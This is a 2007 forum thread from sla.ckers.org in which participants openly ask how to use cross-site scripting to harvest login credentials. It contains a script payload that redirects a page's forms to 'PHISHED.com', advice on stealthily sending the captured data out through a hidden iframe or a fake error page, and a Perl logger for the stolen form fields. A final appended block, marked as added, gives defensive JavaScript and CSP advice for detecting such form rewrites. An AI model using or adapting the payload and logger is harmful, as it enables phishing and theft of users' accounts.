Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Use Of This?
Posted by: Secks
Date: March 25, 2007 07:56PM

<script>document.forms[0].setAttribute("action", "http://www.PHISHED.com/");</script>

Now that's great for phishing accounts, but is there a way I can use it to log all the data submitted by the user and then send it to me?

Re: Use Of This?
Date: March 25, 2007 08:07PM

Forward the data to a PHP file to log it, and then set the location to the target site's error page so people think they did something incorrectly, or there was some form of a server error.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Use Of This?
Posted by: rsnake
Date: March 25, 2007 08:29PM

Yah, that is bound to be pretty obvious when the form stops working. It's better to send the data to yourself in a hidden iframe and then let the user go on their way submitting the form.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 08:39PM

Yeah, but I don't know how to log a form that isn't on my domain.

Re: Use Of This?
Posted by: Tribute
Date: March 25, 2007 08:48PM

How would you set something like this to log the data but also forward the data anyway so they actually login, as to not think something is wrong (or more wrong than what they did)?

Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 08:56PM

I just don't know the kind of script I would use to log all the inputted data.

I mean I know how to set up forms that will log the data, but not this way.



Edited 1 time(s). Last edit at 03/25/2007 09:27PM by Secks.

Re: Use Of This?
Posted by: Henaro
Date: March 25, 2007 09:31PM

You could have it log the data then bring up an error message saying that there was an error, please try again. Then immediately forward them to the actual login form.

Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 09:32PM

Henaro

"I just don't know the kind of script I would use to log all the inputted data."

.....

Going around in fucking circles.



Edited 1 time(s). Last edit at 03/25/2007 09:54PM by Secks.

Re: Use Of This?
Date: March 25, 2007 10:56PM

PHP, use it.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Use Of This?
Posted by: rsnake
Date: March 26, 2007 11:32AM

Or PERL... logging is simple. Here's a super simple example:

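#!/usr/bin/perl
# Minimal CGI logger: appends the fields of a POSTed form to output.txt.
print "Content-Type: text/plain\n\n";
open (LOG, ">>output.txt") or die ("Cannot open $!\n");
# Read the raw POST body (name=value pairs joined by &).
read( STDIN, $argstring, $ENV{CONTENT_LENGTH});
foreach (split(/&/, $argstring)) {
    if (/(.*)=(.*)/) {
        ($nam, $val) = ($1, $2);
        # URL-decode the value: + becomes a space, %XX becomes the byte.
        $val =~ s/\+/ /g ;
        $val =~ s/%(..)/pack('c',hex($1))/eg;
        # Keep only the first value seen for each field name.
        unless (defined $in{$nam}) {
            $in{$nam} = $val;
        }
    }
}
# One tab-separated line per field, then a separator between submissions.
print LOG "$_\t$in{$_}\n" foreach (sort keys(%in));
print LOG "-----------\n";
close LOG;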

- RSnake
Gotta love it. http://ha.ckers.org
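
For defenders, an added example (not code from this thread or its participants) of detecting the form `action` rewrite shown in the first post: it flags any form whose `action`, or a submit control's `formaction`, resolves outside an allow-list of origins, and in a browser re-checks whenever those attributes change. The function names and the `example.com` origins are assumptions made for illustration.

```javascript
// Added defensive example; function names and sample origins are hypothetical.
// Flags forms whose submission target resolves outside the allowed origins.

function resolveTarget(raw, pageUrl) {
  // An empty or missing action submits to the page itself.
  try {
    return new URL(raw || '', pageUrl);
  } catch (e) {
    return null; // unparseable target
  }
}

function auditFormActions(forms, pageUrl, allowedOrigins) {
  const allowed = new Set([new URL(pageUrl).origin, ...allowedOrigins]);
  const findings = [];
  Array.from(forms).forEach((form, index) => {
    // Read the attribute: a control named "action" shadows form.action.
    const targets = [['action', form.getAttribute('action')]];
    // Submit controls can override the form's action with formaction.
    for (const el of Array.from(form.elements || [])) {
      const fa = el.getAttribute && el.getAttribute('formaction');
      if (fa) targets.push(['formaction', fa]);
    }
    for (const [attr, raw] of targets) {
      const url = resolveTarget(raw, pageUrl);
      const ok = url && /^https?:$/.test(url.protocol) && allowed.has(url.origin);
      if (!ok) findings.push({ index, attr, target: raw });
    }
  });
  return findings;
}

// Browser only: re-audit whenever an action/formaction attribute changes
// (setAttribute() and property assignment both alter the attribute).
function watchFormActions(doc, allowedOrigins, report) {
  if (typeof MutationObserver === 'undefined') return null;
  const observer = new MutationObserver(() => {
    const found = auditFormActions(doc.forms, doc.location.href, allowedOrigins);
    if (found.length) report(found);
  });
  observer.observe(doc.documentElement, {
    subtree: true, attributes: true, attributeFilter: ['action', 'formaction'],
  });
  return observer;
}
// In a page: watchFormActions(document, ['https://sso.example.com'], console.warn);
```

A `Content-Security-Policy` header with a `form-action` directive enforces the same allow-list in the browser itself, so it does not depend on this script running before injected code does.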
